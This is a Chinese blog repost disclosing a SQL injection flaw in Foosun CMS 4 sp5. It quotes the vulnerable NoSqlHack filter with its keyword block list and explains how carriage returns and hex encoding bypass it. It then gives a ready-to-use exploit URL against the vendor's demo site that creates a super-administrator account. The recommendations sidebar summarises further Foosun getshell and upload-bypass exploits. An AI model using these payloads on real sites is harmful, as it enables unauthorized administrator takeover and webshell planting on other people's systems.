风讯4高危漏洞

最新推荐文章于 2021-06-02 18:42:53 发布
最新推荐文章于 2021-06-02 18:42:53 发布
阅读量992 收藏
点赞数
文章标签: insert delete function xp cms blog
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kzh4435/article/details/1832860
版权


来源:amxku's blog

oosun cms4sp5 商业版存在严重注射漏洞

风讯4的防注射函数NoSqlHack存在致命缺陷,导致入侵者可以轻松得到webshell

Function.asp
Function NoSqlHack(FS_inputStr)
 Dim f_NoSqlHack_AllStr,f_NoSqlHack_Str,f_NoSqlHack_i,Str_InputStr
 Str_InputStr=FS_inputStr
 f_NoSqlHack_AllStr="*|and |exec |or |insert |select |delete |update |count |master |truncate |declare |and |exec |insert |select |delete |update |count |master |truncate |declare |char(|mid(|chr(|and[|exec[|insert[|select[|delete[|update[|count[|master[|truncate[|declare[|set[|set |set |where[|where |where |xp_cmdshell|xp_cmdshell |xp_cmdshell "
 f_NoSqlHack_Str = Split(f_NoSqlHack_AllStr,"|")

 For f_NoSqlHack_i=LBound(f_NoSqlHack_Str) To Ubound(f_NoSqlHack_Str)
 If Instr(LCase(Str_InputStr),f_NoSqlHack_Str(f_NoSqlHack_i))<>0 Then
 If f_NoSqlHack_Str(f_NoSqlHack_i)="'" Then f_NoSqlHack_Str(f_NoSqlHack_i)=" /' "
 Response.Write "<html><title>??</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>???????????</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>?????????!</li><br><li>??IP:"&Request.ServerVariables("Remote_Addr")&"</li><br><li>????:"&Now&"</li></font></body></html><!--Powered by Foosun Inc.,AddTime:"&now&"-->"
 Response.End
 End if
 Next
 NoSqlHack = Replace(Str_InputStr,"'","''")
End Function
关键字后面跟空格和tab是过滤的,但是跟回车时一样可以执行注射语句.过滤单引号也没有用的,我插入时用16进制编码,所以每一个点都是有问题的注射点

下面的代码可以创建一个用户名为oldjun,密码为12345678的超级管理员
http://demo.foosun.net/User/i_Blog/PublicLogEdit.asp?id=2;insert%0D%0A%0D%0Ainto%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)--  

kzh4435
关注
风讯CMS常见问题锦集
09-28
关键字描述:常见问题 &rdquo &ldquo 系统 是否 文件 如果 提示 权限风讯CMS系统在使用的时候可能出现各种情况,根据详细的提示信息,分别找到解决的办法,目前遇到的可能不全面,只是把常见的列出来,以供大家参考。 1.出现提示网页无法显示,500错误的时候,又没
风讯4.0Sp4风讯4.0Sp4风讯4.0Sp4
03-22
FoosunCMS4.0 Sp4商业版补丁.rar是一个补丁文件,用于修复风讯4.0Sp4可能存在的问题或漏洞,同时可能增强了系统性能和安全性。用户需要先下载这个rar文件,然后按照SP4安装说明.txt的指导进行安装,确保补丁正确应用...
风讯CMS4.0sp5 商业版的致命伤
weixin_34128534的博客
12-14 176
文章作者:oldjun&amp;flyh4t[ 脚本安全小组]信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:文章已经发表在《***手册》后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明出处FooSunCMS(风讯网站管理系统)是由四川风讯科技发展有限公司自主编写的一套ASP+ACCESS/MSSQL的内容管理系统程序,FoosunCM...
风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
收集盒 Book box
07-06 752
风讯foosun的注册文件存在漏洞。可以暴管理员帐号和密码。漏洞文件:http://www.dj4now.com/user/SetNextOptions.asp 利用简单的方法:暴管理员帐号:复制代码http://www.dj4now.com/user/Set
风讯好记帐(免费的财务软件)
07-10
真正免费的财务软件--风讯好记帐---除了名字不同,所有功能模块、甚至界面都和财务王软件完全一样,而且财务王的帐套文件也能在这个软件打开。我原先是用的财务王软件免费版本的,没想到2月后就提示我要付费买正版,...
风讯网站内容管理系统(FoosunCMS) v3.2 Sp1
10-12
功能介绍: 全新操作界面 无限分类 生成目录自由保存到指定的目录 全静态生成 全个性化模板生成,模板由用户自由定义 支持二级域名管理 栏目自定义生成文件名规则 栏目可以排序,
风讯网站内容管理系统(FoosunCMS) v2.0
10-12
完全生成静态网页:FoosunCMS把维护人员上传的内容,结合事先制作好的模板,生成静态网页。 独创的模板技术:类似于ASP/JSP的模板语言,提供了最大的灵活性,却又无需要专门学习。更有
风讯网站内容管理系统(FoosunCMS) v5.0 build 010129
10-12
继FoosunCMS4.0版发布以来,我们收到了广大热心用户在使用测试中积极反馈过来的不少建议和意见,同时我们的测试人员以及研发人员进行全面测试并不断的投入BUG修复工作中。迄今,我
风讯dotNETCMS v1.0 sp5 20110408
10-26
dotNETCMS免费版本是一款具有强大功能的基于ASP.NET+MSSQL构架的内容管理软件,国内领先的第一款开源的、集成web2.0元素的、模块化的CMS建站系统。dotNETCMS功能3C3MY-C9G9C-ES19G-G31M9-EGWE5   程序特点:1.全部生成静态页面/动态页面2.完全人性化的操作方式3.系统内置标签和自由标签管理,可以生成任何页面需要的任何元素和样式 4.集成了新闻采集系统5.会员管理系统,并与流行论坛高度整合6.自由化的权限分配管理 7.全个性化模板生成,模板由用户自由定义8.投稿,投票,广告管理9.面向高级技术人员的自由化SQL扩展标签10.自动生成图片水印 11.后台操作自由灵活 12.Ftp同步 13.其他一些功能..在dotNetcms v1.0 sp5版本基础上更新列表:1 关于专题权限功能无效2 添加表单标签提示如下错误3 关于栏目管理,栏目超出三级后,下级栏目就无法弹出来显示。4 关于频道的幻灯标签插入模板导致不能发布,发布一直百分之零。5 关于频道样式、标签编辑器的问题6 搜索分页显示不正常7 发布管理里面,将锁定的栏目都显示出来了,
风讯dotNETCMS v1.0sp1_完整版_升级包
12-17
自3月22日dotNETCMSv1.0免费版本发布后,dotNETCMSv1.0的SP1补丁准备工作稳定进行,其间陆续收到各位朋友们热心的意见和BUG反馈,也加快了我们BUG收集进度,同时更有利于我们根据用户反映情况优先解决用户在操作使用中遇到的问题。 风讯科技发展有限公司决定于2008年4月23日下午3:30提供免费版本dotNETCMSv1.0SP1下载。   同时,应广大爱好者的强烈要求,为了降低用户的成本,操作难度,风讯同时推出dotNETCMSv1.0ACCESS版本。 [BUG修复清单]   1.动态调用,终极列表,仅在第一页能显示出来。其他页面为空白。   2.点击发布管理--发布日志,解决了提示有误信息。   3.关于后台自定义表单存在表单项,显示不完全。   4.修正新闻附件时,自动加载一条下载项。   5.采集系统,使用新浪网类似采集时,采集失败100%,查看URL采集的地址,是因为地址不正确引起的,即继承了栏目的URL。   6.新增JS发布功能。   7.进一步修正网站端口合理性,如:带有端口号的问题。生成的连接路径: <a href=":84/html/2008-4/2008-4-14-14-3。html">这种显示不对,端口号应该是与域名连在一起的。会员标签问题 调查,广告类的端口问题。   8.增加后台上传文件后预览格式--Pdf格式已加入预览行列。   9.解决了栏目和新闻复制与移动报错。   10.将栏目管理生成静态文件的方式,修改成与新闻管理的新闻生成方式一致,不需要返回到发布管理时里面去处理生成。   11.解决了关于列表标签新闻条数据不受限制的问题。(新闻列表标签,调用数据成2的倍数,调用2条出现4条,调用5条出现10条。 同时每一个列表标签下面都跟了一个更多链接,请将更多链接加入标签里面, 以便进行设置样式,显示名称。同时还存在一个问题,如果我调用的最新所有的新闻,那么这个更多链接到那个页面呢?)   12.当列表标签生成以table方式生成后,代码出现如下情况,无头<table>但有结束</table>。   13.完善了会员投稿错误功能。   14.修正AC、SQL版本的终极列表页,分页偶尔显示标签的情况。   15.修正系统学习和练习使用模版,在编辑时不显示CSS框架布局的情况。   16.修正了AC版相关报错的情况。 17.完善了修改新闻栏目批量属性的功能。   18.完善了动态发布新闻标题与内容正确链接的情况。   19.后台评论管理,操作某条评论时,称对其进行解锁或锁定影响其它评论的完善。   20.修正了会员中心添加好友,发信息时提示有误的情况。   21.修正会员讨论组捐献有误提示。   22.完善会员中心在任意地方登录默认为Admin用户。   23.修正了栏目列表标签无更多链接,加入了更多的设置。   24.完善了渐变广告位置不能设置,一直在左下角的功能。   25.修正了自定义字段的栏目归档新闻指向新的数据表。   26.修正了AC版本中数据库备份成功了的,点击下载却出错。   27.论坛整合修正。
风讯dotNETCMS 0day
积木网络
10-14 1834
厂商:风讯 网址:www.foosun.net 漏洞影响:风讯dotNETCMS 通杀 测试了 v1.0 sp4 sp5 漏洞作者:kooice 漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变…. 上传1.asp;.jpg 然后你们懂的!   本文来源于:凯里黑客http://www.0855.tv ,转载请注明来处,谢谢!
【原创】风讯DotNetCMS V1.0~V2.0 SQL注入漏洞
weixin_33850890的博客
11-09 510
  文章作者:rebeyond  注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到乌云-漏洞报告平台。I.S.T.O版权所有,转载需注明作者。  受影响版本:貌似都受影响。  漏洞文件:user/City_ajax.aspx  漏洞分析:这个页面里的getCityList函数,通过用户传入的CityId参数来进行省份和城市查询。请求,都没有进行权限的验证,游客权限就可以调用其中...
自动修改html标签,超强无HTML标签修改的方法[FOOSUN系统]
weixin_28951585的博客
06-02 250
超强无HTML标签修改的方法[FOOSUN系统]文章作者:网友投稿 发布时间:2009-10-11 17:15:07 来源:网络使用FOOSUN一段时间了,总喜欢拿别人一些比较酷炫的FLASH幻灯效果莱玩,可FOOSUN每个标签都要生成部分HTML代码,让我很不是爽快。老引起FLASH幻灯代码的错误。所以今天就研究了一下把他自动生成的HTML代码去掉。修改如下:(查找内容均不包含双引号) 第一步:...
风讯 4.0之前所有版本通杀拿SHELL 0day
收集盒 Book box
07-08 594
直接:/admin/SelectManageDir/FolderImageList.asp?Type=AddFolder&Path=/UploadFile/1.asp//&CurrPath=/UploadFile&ShowVirtualPath=会自己跳转文件管理页面,新建1.a
php任意下载文件漏洞,FengCMS任意文件下载漏洞
weixin_29310605的博客
03-27 336
本文转载自RookieHacker的博客假期闲着没事干,正好一个表哥举办了一场不错的CTF,这次渗透就是基于一个表哥搭建的实验环境,也算是记一下writeup吧~关于任意文件任意FengCms——由地方网络工作室基于PHP+MYSQL开发。是一款开源的网站内容管理系统。而这个漏洞也挺久了(虽然小菜鸟不久前才知道。。),WooYun-2014-76648:FengCMS 修复不当导致getshell...
风讯标签系统详解与使用指南
4. **图片和多媒体标签**: - `{#Picture}`:文章主图的URL。 - `{#sPicture}`:可能是指缩略图或辅助图片的URL。 - `{#Tags}`:文章关联的标签列表。 5. **评论和互动标签**: - `{#CommForm}`:评论表单,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值